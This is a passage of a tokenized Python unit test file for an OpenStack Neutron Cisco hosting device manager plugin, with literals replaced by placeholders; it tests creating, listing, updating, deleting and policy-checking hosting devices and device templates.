DEFAULT_CREDENTIALS_ID = device_manager_test_support . _uuid ( ) <EOL> class DeviceManagerTestCaseMixin ( object ) : <EOL> def _create_hosting_device ( self , fmt , template_id , management_port_id , <EOL> admin_state_up , expected_res_status = None , <EOL> ** kwargs ) : <EOL> data = { '<STR_LIT>' : self . _get_test_hosting_device_attr ( <EOL> template_id = template_id , management_port_id = management_port_id , <EOL> admin_state_up = admin_state_up , ** kwargs ) } <EOL> hd_req = self . new_create_request ( '<STR_LIT>' , data , fmt ) <EOL> if kwargs . get ( '<STR_LIT>' ) and '<STR_LIT>' in kwargs : <EOL> hd_req . environ [ '<STR_LIT>' ] = n_context . Context ( <EOL> '<STR_LIT>' , kwargs [ '<STR_LIT>' ] ) <EOL> hd_res = hd_req . get_response ( self . ext_api ) <EOL> if expected_res_status : <EOL> self . assertEqual ( expected_res_status , hd_res . status_int ) <EOL> return hd_res <EOL> @ contextlib . contextmanager <EOL> def hosting_device ( self , template_id , management_port_id = None , fmt = None , <EOL> admin_state_up = True , no_delete = False , <EOL> set_port_device_id = True , ** kwargs ) : <EOL> if not fmt : <EOL> fmt = self . fmt <EOL> res = self . _create_hosting_device ( fmt , template_id , management_port_id , <EOL> admin_state_up , ** kwargs ) <EOL> if res . status_int >= <NUM_LIT> : <EOL> raise webob . exc . HTTPClientError ( code = res . status_int ) <EOL> hosting_device = self . deserialize ( fmt or self . fmt , res ) <EOL> if set_port_device_id is True and management_port_id is not None : <EOL> data = { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : hosting_device [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = self . new_update_request ( '<STR_LIT>' , data , management_port_id ) <EOL> res = self . deserialize ( self . fmt , req . get_response ( self . api ) ) <EOL> yield hosting_device <EOL> if not no_delete : <EOL> self . _delete ( '<STR_LIT>' , <EOL> hosting_device [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> def _create_hosting_device_template ( self , fmt , name , enabled , <EOL> host_category , <EOL> expected_res_status = None , ** kwargs ) : <EOL> data = { '<STR_LIT>' : <EOL> self . _get_test_hosting_device_template_attr ( <EOL> name = name , enabled = enabled , host_category = host_category , <EOL> ** kwargs ) } <EOL> hdt_req = self . new_create_request ( '<STR_LIT>' , data , <EOL> fmt ) <EOL> if kwargs . get ( '<STR_LIT>' ) and '<STR_LIT>' in kwargs : <EOL> hdt_req . environ [ '<STR_LIT>' ] = n_context . Context ( <EOL> '<STR_LIT>' , kwargs [ '<STR_LIT>' ] ) <EOL> hdt_res = hdt_req . get_response ( self . ext_api ) <EOL> if expected_res_status : <EOL> self . assertEqual ( expected_res_status , hdt_res . status_int ) <EOL> return hdt_res <EOL> @ contextlib . contextmanager <EOL> def hosting_device_template ( self , fmt = None , name = '<STR_LIT>' , <EOL> enabled = True , host_category = VM_CATEGORY , <EOL> no_delete = False , ** kwargs ) : <EOL> if not fmt : <EOL> fmt = self . fmt <EOL> res = self . _create_hosting_device_template ( fmt , name , enabled , <EOL> host_category , ** kwargs ) <EOL> if res . status_int >= <NUM_LIT> : <EOL> raise webob . exc . HTTPClientError ( code = res . status_int ) <EOL> hd_template = self . deserialize ( fmt or self . fmt , res ) <EOL> yield hd_template <EOL> if not no_delete : <EOL> self . _delete ( '<STR_LIT>' , <EOL> hd_template [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> def _get_test_hosting_device_attr ( self , template_id , management_port_id , <EOL> admin_state_up = True , ** kwargs ) : <EOL> data = { <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , self . _tenant_id ) , <EOL> '<STR_LIT>' : template_id , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : admin_state_up , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : management_port_id , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , False ) } <EOL> return data <EOL> def _get_test_hosting_device_template_attr ( self , name = '<STR_LIT>' , <EOL> enabled = True , <EOL> host_category = VM_CATEGORY , <EOL> ** kwargs ) : <EOL> data = { <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , self . _tenant_id ) , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : enabled , <EOL> '<STR_LIT>' : host_category , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> DEFAULT_SERVICE_TYPES ) , <EOL> '<STR_LIT:image>' : kwargs . get ( '<STR_LIT:image>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> DEFAULT_CREDENTIALS_ID ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , NOOP_DEVICE_DRIVER ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> NOOP_PLUGGING_DRIVER ) } <EOL> return data <EOL> def _test_list_resources ( self , resource , items , <EOL> neutron_context = None , <EOL> query_params = None ) : <EOL> if resource . endswith ( '<STR_LIT:y>' ) : <EOL> resource_plural = resource . replace ( '<STR_LIT:y>' , '<STR_LIT>' ) <EOL> else : <EOL> resource_plural = resource + '<STR_LIT:s>' <EOL> res = self . _list ( resource_plural , <EOL> neutron_context = neutron_context , <EOL> query_params = query_params ) <EOL> resource = resource . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> self . assertEqual ( sorted ( [ i [ resource ] [ '<STR_LIT:id>' ] for i in items ] ) , <EOL> sorted ( [ i [ '<STR_LIT:id>' ] for i in res [ resource_plural ] ] ) ) <EOL> def _replace_hosting_device_status ( self , attrs , old_status , new_status ) : <EOL> if attrs [ '<STR_LIT:status>' ] is old_status : <EOL> attrs [ '<STR_LIT:status>' ] = new_status <EOL> return attrs <EOL> def _test_create_hosting_device_templates ( self ) : <EOL> nnt = self . _create_hosting_device_template ( self . fmt , NN_TEMPLATE_NAME , <EOL> True , NN_CATEGORY ) <EOL> nw_node_template = self . deserialize ( self . fmt , nnt ) <EOL> vmt = self . _create_hosting_device_template ( <EOL> self . fmt , VM_TEMPLATE_NAME , True , VM_CATEGORY , <EOL> booting_time = VM_BOOTING_TIME , <EOL> slot_capacity = VM_SLOT_CAPACITY , <EOL> desired_slots_free = VM_DESIRED_SLOTS_FREE , <EOL> device_driver = TEST_DEVICE_DRIVER , <EOL> plugging_driver = TEST_PLUGGING_DRIVER ) <EOL> vm_template = self . deserialize ( self . fmt , vmt ) <EOL> hwt = self . _create_hosting_device_template ( <EOL> self . fmt , HW_TEMPLATE_NAME , True , HW_CATEGORY ) <EOL> hw_template = self . deserialize ( self . fmt , hwt ) <EOL> return { '<STR_LIT>' : { '<STR_LIT>' : nw_node_template , <EOL> '<STR_LIT>' : NS_ROUTERTYPE_NAME } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : vm_template , <EOL> '<STR_LIT>' : VM_ROUTERTYPE_NAME } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : hw_template , <EOL> '<STR_LIT>' : HW_ROUTERTYPE_NAME } } <EOL> def _test_remove_hosting_device_templates ( self ) : <EOL> for hdt in self . _list ( '<STR_LIT>' ) [ <EOL> '<STR_LIT>' ] : <EOL> self . _delete ( '<STR_LIT>' , hdt [ '<STR_LIT:id>' ] ) <EOL> class TestDeviceManagerDBPlugin ( <EOL> test_db_base_plugin_v2 . NeutronDbPluginV2TestCase , <EOL> DeviceManagerTestCaseMixin , <EOL> device_manager_test_support . DeviceManagerTestSupportMixin ) : <EOL> hdm_db . HostingDeviceManagerMixin . path_prefix = "<STR_LIT>" <EOL> resource_prefix_map = dict ( <EOL> ( k , "<STR_LIT>" ) <EOL> for k in ciscohostingdevicemanager . RESOURCE_ATTRIBUTE_MAP . keys ( ) ) <EOL> def setUp ( self , core_plugin = None , dm_plugin = None , ext_mgr = None ) : <EOL> if dm_plugin is None : <EOL> dm_plugin = DB_DM_PLUGIN_KLASS <EOL> service_plugins = { '<STR_LIT>' : dm_plugin } <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> device_manager_test_support . extensions_path ) <EOL> cfg . CONF . set_default ( '<STR_LIT>' , True ) <EOL> hdm_db . HostingDeviceManagerMixin . supported_extension_aliases = ( <EOL> [ ciscohostingdevicemanager . HOSTING_DEVICE_MANAGER_ALIAS ] ) <EOL> super ( TestDeviceManagerDBPlugin , self ) . setUp ( <EOL> plugin = core_plugin , service_plugins = service_plugins , <EOL> ext_mgr = ext_mgr ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , policy_path , '<STR_LIT>' ) <EOL> if not ext_mgr : <EOL> self . plugin = importutils . import_object ( dm_plugin ) <EOL> ext_mgr = api_ext . PluginAwareExtensionManager ( <EOL> device_manager_test_support . extensions_path , <EOL> { c_constants . DEVICE_MANAGER : self . plugin } ) <EOL> app = config . load_paste_app ( '<STR_LIT>' ) <EOL> self . ext_api = api_ext . ExtensionMiddleware ( app , ext_mgr = ext_mgr ) <EOL> self . _mock_l3_admin_tenant ( ) <EOL> self . _create_mgmt_nw_for_tests ( self . fmt ) <EOL> self . _devmgr = NeutronManager . get_service_plugins ( ) [ <EOL> c_constants . DEVICE_MANAGER ] <EOL> self . _devmgr . _svc_vm_mgr_obj = service_vm_lib . ServiceVMManager ( <EOL> True , None , None , None , '<STR_LIT>' , keystone_session = mock . MagicMock ( ) ) <EOL> self . _mock_svc_vm_create_delete ( self . _devmgr ) <EOL> self . _other_tenant_id = device_manager_test_support . _uuid ( ) <EOL> self . _devmgr . _core_plugin = NeutronManager . get_plugin ( ) <EOL> def tearDown ( self ) : <EOL> self . _test_remove_all_hosting_devices ( ) <EOL> self . _remove_mgmt_nw_for_tests ( ) <EOL> super ( TestDeviceManagerDBPlugin , self ) . tearDown ( ) <EOL> def test_create_vm_hosting_device ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , credentials_id = creds ) as hd : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hd [ '<STR_LIT>' ] [ k ] ) <EOL> def test_create_hw_hosting_device ( self ) : <EOL> with self . hosting_device_template ( host_category = HW_CATEGORY ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) as hd : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hd [ '<STR_LIT>' ] [ k ] ) <EOL> def test_show_hosting_device ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) as hd : <EOL> req = self . new_show_request ( <EOL> '<STR_LIT>' , hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> fmt = self . fmt ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_list_hosting_devices ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port1 , self . port ( subnet = self . _mgmt_subnet ) as mgmt_port2 , self . port ( subnet = self . _mgmt_subnet ) as mgmt_port3 : <EOL> mp1_id = mgmt_port1 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp2_id = mgmt_port2 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp3_id = mgmt_port3 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> name = '<STR_LIT>' , template_id = hdt_id , <EOL> management_port_id = mp1_id ) as hd1 , self . hosting_device ( <EOL> name = '<STR_LIT>' , template_id = hdt_id , <EOL> management_port_id = mp2_id ) as hd2 , self . hosting_device ( <EOL> name = '<STR_LIT>' , template_id = hdt_id , <EOL> management_port_id = mp3_id ) as hd3 : <EOL> self . _test_list_resources ( <EOL> '<STR_LIT>' , [ hd1 , hd2 , hd3 ] , <EOL> query_params = '<STR_LIT>' + hdt_id ) <EOL> def test_update_hosting_device ( self ) : <EOL> new_device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> device_id = new_device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id , <EOL> credentials_id = creds ) as hd : <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : new_device_id } } <EOL> req = self . new_update_request ( '<STR_LIT>' , data , <EOL> hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_delete_hosting_device_not_in_use_succeeds ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( template_id = hdt_id , <EOL> management_port_id = mgmt_port_id , <EOL> no_delete = True ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> req = self . new_delete_request ( '<STR_LIT>' , hd_id ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceNotFound , <EOL> self . plugin . get_hosting_device , ctx , hd_id ) <EOL> def test_delete_hosting_device_in_use_fails ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( slot_capacity = <NUM_LIT:1> ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) as hd : <EOL> with mock . patch . object ( <EOL> hdm_db . HostingDeviceManagerMixin , <EOL> '<STR_LIT>' ) : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hd_db = self . _devmgr . _get_hosting_device ( ctx , hd_id ) <EOL> resource = self . _get_fake_resource ( ) <EOL> self . assertTrue ( <EOL> self . _devmgr . acquire_hosting_device_slots ( <EOL> ctx , hd_db , resource , '<STR_LIT>' , L3_ROUTER_NAT , <EOL> <NUM_LIT:1> ) ) <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceInUse , <EOL> self . _devmgr . delete_hosting_device , ctx , hd_id ) <EOL> req = self . new_show_request ( '<STR_LIT>' , hd_id , <EOL> fmt = self . fmt ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT:200> , res . status_int ) <EOL> self . _devmgr . release_hosting_device_slots ( ctx , hd_db , <EOL> resource , <NUM_LIT:1> ) <EOL> def test_get_hosting_device_configuration ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> rpc = devmgr_rpc_cfgagent_api . DeviceMgrCfgAgentNotifyAPI ( <EOL> self . _devmgr ) <EOL> self . _devmgr . agent_notifiers = { <EOL> c_constants . AGENT_TYPE_CFG : rpc } <EOL> self . _devmgr . get_cfg_agents_for_hosting_devices = None <EOL> with mock . patch . object ( rpc . client , '<STR_LIT>' , <EOL> return_value = rpc . client ) as ( <EOL> mock_prepare ) , mock . patch . object ( rpc . client , '<STR_LIT>' ) as mock_call , mock . patch . object ( <EOL> self . _devmgr , <EOL> '<STR_LIT>' ) as agt_mock : <EOL> agt_mock . return_value = [ mock . MagicMock ( ) ] <EOL> agent_host = '<STR_LIT>' <EOL> agt_mock . return_value [ <NUM_LIT:0> ] . host = agent_host <EOL> fake_running_config = '<STR_LIT>' <EOL> mock_call . return_value = fake_running_config <EOL> ctx = n_context . Context ( <EOL> user_id = None , tenant_id = None , is_admin = False , <EOL> overwrite = False ) <EOL> res = self . _devmgr . get_hosting_device_config ( ctx , <EOL> hd_id ) <EOL> self . assertEqual ( fake_running_config , res ) <EOL> agt_mock . assert_called_once_with ( <EOL> mock . ANY , [ hd_id ] , admin_state_up = True , <EOL> schedule = True ) <EOL> mock_prepare . assert_called_with ( server = agent_host ) <EOL> mock_call . assert_called_with ( <EOL> mock . ANY , '<STR_LIT>' , <EOL> payload = { '<STR_LIT>' : hd_id } ) <EOL> def test_get_hosting_device_configuration_no_agent_found ( self ) : <EOL> ctx = n_context . Context ( user_id = None , tenant_id = None , is_admin = False , <EOL> overwrite = False ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> rpc = devmgr_rpc_cfgagent_api . DeviceMgrCfgAgentNotifyAPI ( <EOL> self . _devmgr ) <EOL> self . _devmgr . agent_notifiers = { <EOL> c_constants . AGENT_TYPE_CFG : rpc } <EOL> self . _devmgr . get_cfg_agents_for_hosting_devices = None <EOL> with mock . patch . object ( rpc . client , '<STR_LIT>' , <EOL> return_value = rpc . client ) as ( <EOL> mock_prepare ) , mock . patch . object ( rpc . client , '<STR_LIT>' ) as mock_call , mock . patch . object ( <EOL> self . _devmgr , <EOL> '<STR_LIT>' ) as agt_mock : <EOL> agt_mock . return_value = [ ] <EOL> res = self . _devmgr . get_hosting_device_config ( ctx , <EOL> hd_id ) <EOL> self . assertIsNone ( res ) <EOL> agt_mock . assert_called_once_with ( <EOL> mock . ANY , [ hd_id ] , admin_state_up = True , <EOL> schedule = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_prepare . call_count ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_call . call_count ) <EOL> def test_hosting_device_policy ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id , <EOL> credentials_id = creds ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> self . _create_hosting_device ( <EOL> self . fmt , hdt_id , mgmt_port_id , True , <EOL> webob . exc . HTTPForbidden . code , <EOL> tenant_id = tenant_id , set_context = True ) <EOL> non_admin_ctx = n_context . Context ( '<STR_LIT>' , tenant_id ) <EOL> self . _show ( '<STR_LIT>' , hd_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> self . _update ( '<STR_LIT>' , hd_id , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } , <EOL> webob . exc . HTTPForbidden . code , non_admin_ctx ) <EOL> self . _delete ( '<STR_LIT>' , hd_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> req = self . new_show_request ( <EOL> '<STR_LIT>' , hd_id , self . fmt , <EOL> '<STR_LIT>' ) <EOL> req . environ [ '<STR_LIT>' ] = non_admin_ctx <EOL> res = req . get_response ( self . _api_for_resource ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( webob . exc . HTTPNotFound . code , <EOL> res . status_int ) <EOL> def test_create_vm_hosting_device_template ( self ) : <EOL> attrs = self . _get_test_hosting_device_template_attr ( ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hdt [ '<STR_LIT>' ] [ k ] ) <EOL> def test_create_hw_hosting_device_template ( self ) : <EOL> attrs = self . _get_test_hosting_device_template_attr ( <EOL> host_category = HW_CATEGORY ) <EOL> with self . hosting_device_template ( host_category = HW_CATEGORY ) as hdt : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hdt [ '<STR_LIT>' ] [ k ] ) <EOL> def test_create_nn_hosting_device_template ( self ) : <EOL> attrs = self . _get_test_hosting_device_template_attr ( <EOL> host_category = NN_CATEGORY ) <EOL> with self . hosting_device_template ( host_category = NN_CATEGORY ) as hdt : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hdt [ '<STR_LIT>' ] [ k ] ) <EOL> def test_show_hosting_device_template ( self ) : <EOL> name = "<STR_LIT>" <EOL> attrs = self . _get_test_hosting_device_template_attr ( name = name ) <EOL> with self . hosting_device_template ( name = name ) as hdt : <EOL> req = self . new_show_request ( '<STR_LIT>' , <EOL> hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> fmt = self . fmt ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_list_hosting_device_templates ( self ) : <EOL> with self . hosting_device_template ( name = '<STR_LIT>' , <EOL> host_category = VM_CATEGORY , <EOL> image = '<STR_LIT>' ) as hdt1 , self . hosting_device_template ( name = '<STR_LIT>' , <EOL> host_category = HW_CATEGORY , <EOL> image = '<STR_LIT>' ) as hdt2 , self . hosting_device_template ( name = '<STR_LIT>' , <EOL> host_category = NN_CATEGORY , <EOL> image = '<STR_LIT>' ) as hdt3 : <EOL> self . _test_list_resources ( <EOL> '<STR_LIT>' , [ hdt1 , hdt2 , hdt3 ] , <EOL> query_params = '<STR_LIT>' ) <EOL> def test_update_hosting_device_template ( self ) : <EOL> name = "<STR_LIT>" <EOL> attrs = self . _get_test_hosting_device_template_attr ( name = name ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : name } } <EOL> req = self . new_update_request ( '<STR_LIT>' , data , <EOL> hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_delete_hosting_device_template_not_in_use_succeeds ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( no_delete = True ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> req = self . new_delete_request ( '<STR_LIT>' , hdt_id ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceTemplateNotFound , <EOL> self . _devmgr . get_hosting_device_template , ctx , hdt_id ) <EOL> def test_delete_hosting_device_template_in_use_fails ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) : <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceTemplateInUse , <EOL> self . _devmgr . delete_hosting_device_template , ctx , <EOL> hdt_id ) <EOL> req = self . new_show_request ( '<STR_LIT>' , <EOL> hdt_id , fmt = self . fmt ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT:200> , res . status_int ) <EOL> def test_hosting_device_template_policy ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . _create_hosting_device_template ( <EOL> self . fmt , '<STR_LIT>' , True , '<STR_LIT>' , <EOL> webob . exc . HTTPForbidden . code , <EOL> tenant_id = tenant_id , set_context = True ) <EOL> non_admin_ctx = n_context . Context ( '<STR_LIT>' , tenant_id ) <EOL> self . _show ( '<STR_LIT>' , hdt_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> self . _update ( '<STR_LIT>' , hdt_id , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : False } } , <EOL> webob . exc . HTTPForbidden . code , non_admin_ctx ) <EOL> self . _delete ( '<STR_LIT>' , hdt_id , <EOL> webob . exc . HTTPNotFound . code , non_admin_ctx ) <EOL> def _test_get_driver ( self , get_method , id = None , test_for_none = False , <EOL> is_admin = False ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> context = self . _get_test_context ( <EOL> tenant_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> is_admin = is_admin ) <EOL> driver_getter = 